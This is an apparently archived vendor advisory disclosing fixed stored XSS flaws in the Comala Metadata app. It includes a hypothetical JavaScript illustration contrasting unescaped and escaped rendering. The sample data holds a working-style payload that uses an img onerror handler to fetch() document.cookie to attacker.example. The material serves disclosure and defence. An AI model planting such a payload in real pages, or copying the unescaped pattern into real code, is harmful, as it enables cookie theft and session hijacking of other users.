This site has moved to the integrated Appfire documentation and information site for our apps.

From February 2024 this site is no longer updated.

If you have any questions, please email support@appfire.com.

Comala Metadata Security Advisory 2020-10-27

This advisory discloses security vulnerabilities found and fixed in Comala Metadata. We recommend upgrading Comala Metadata to the latest supported version.

Affected Versions

These vulnerabilities affect all versions of Comala Metadata prior to 4.2.4.

The 4.2.4 release contains the fix for the issues described below.

XSS Vulnerabilities

Severity

Comalatech rates the severity of these issues as Medium according to the published Atlassian Security Levels. We have ranked the vulnerabilities as Medium because:

  • A registered user with edit permissions over pages or blog posts in the application could inject script that runs in the browser of any other user who views the affected content, and could use that to do the following: 
    • Session riding (performing actions in the application as the viewing user)
    • Stealing information and cookies
    • Creating a phishing page within the domain

This is an independent assessment and you should evaluate its applicability to your own IT environment.

Description

We have fixed several persistent (stored) cross-site scripting vulnerabilities in Comala Metadata. Because the injected content is stored and rendered to every subsequent viewer, a user with edit permissions could run script in other users' browsers and thereby act within another user's session.
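The advisory does not describe the affected code paths, so the following is a hypothetical illustration of the bug class only, added here and not taken from Comala Metadata: a user-supplied metadata value is concatenated straight into page HTML (vulnerable pattern), beside a version that encodes every untrusted value for the HTML context it lands in (hardened pattern). The field names, the `STORED_METADATA` sample and the `attacker.example` host are constructed for the example.

```javascript
// Hypothetical illustration of a stored (persistent) XSS bug and its fix.
// This is NOT Comala Metadata's code; the field names, rendering logic and
// sample payload are assumptions made for this example.

// Constructed sample: metadata values saved by a user with page edit rights.
// The reviewNote value is the attacker-controlled payload (constructed).
const STORED_METADATA = {
  owner: 'alice',
  reviewNote: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable pattern: stored values are interpolated directly into HTML.
// Every later viewer of the page executes the payload in their own session,
// which is what makes stored XSS a session-riding and cookie-theft primitive.
function renderMetadataUnsafe(meta) {
  return Object.entries(meta)
    .map(([key, value]) => `<tr><td>${key}</td><td>${value}</td></tr>`)
    .join('\n');
}

// Output encoding for the HTML text and double-quoted attribute contexts.
// '&' must be replaced first so that the entities produced below are not re-encoded.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened pattern: both the key and the value are encoded before they reach
// the HTML, so the stored payload is displayed as text rather than executed.
function renderMetadataSafe(meta) {
  return Object.entries(meta)
    .map(([key, value]) => `<tr><td>${escapeHtml(key)}</td><td>${escapeHtml(value)}</td></tr>`)
    .join('\n');
}

// Heuristic check a reviewer can run over rendered output: does any stored value
// that contains markup-significant characters appear verbatim (unencoded) in the HTML?
// This detects the vulnerable pattern above; it is not a substitute for encoding.
function containsRawMarkup(html, meta) {
  return Object.values(meta).some(
    (v) => /[<>"']/.test(String(v)) && html.includes(String(v)),
  );
}

console.log('unsafe render:\n' + renderMetadataUnsafe(STORED_METADATA));
console.log('safe render:\n' + renderMetadataSafe(STORED_METADATA));
console.log('raw markup in unsafe output:', containsRawMarkup(renderMetadataUnsafe(STORED_METADATA), STORED_METADATA));
console.log('raw markup in safe output:', containsRawMarkup(renderMetadataSafe(STORED_METADATA), STORED_METADATA));
```

The encoding shown is the minimum for values placed in HTML text or quoted attributes; values placed into JavaScript, URLs or CSS need the encoder for that context, and in a Confluence app the platform's own templating escapes should be used rather than a hand-rolled function.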

Risk Mitigation

Sites running Comala Metadata prior to version 4.2.4 are recommended to upgrade to Comala Metadata 4.2.4 or later.

If upgrading immediately is not possible, disable the app until you are able to upgrade it.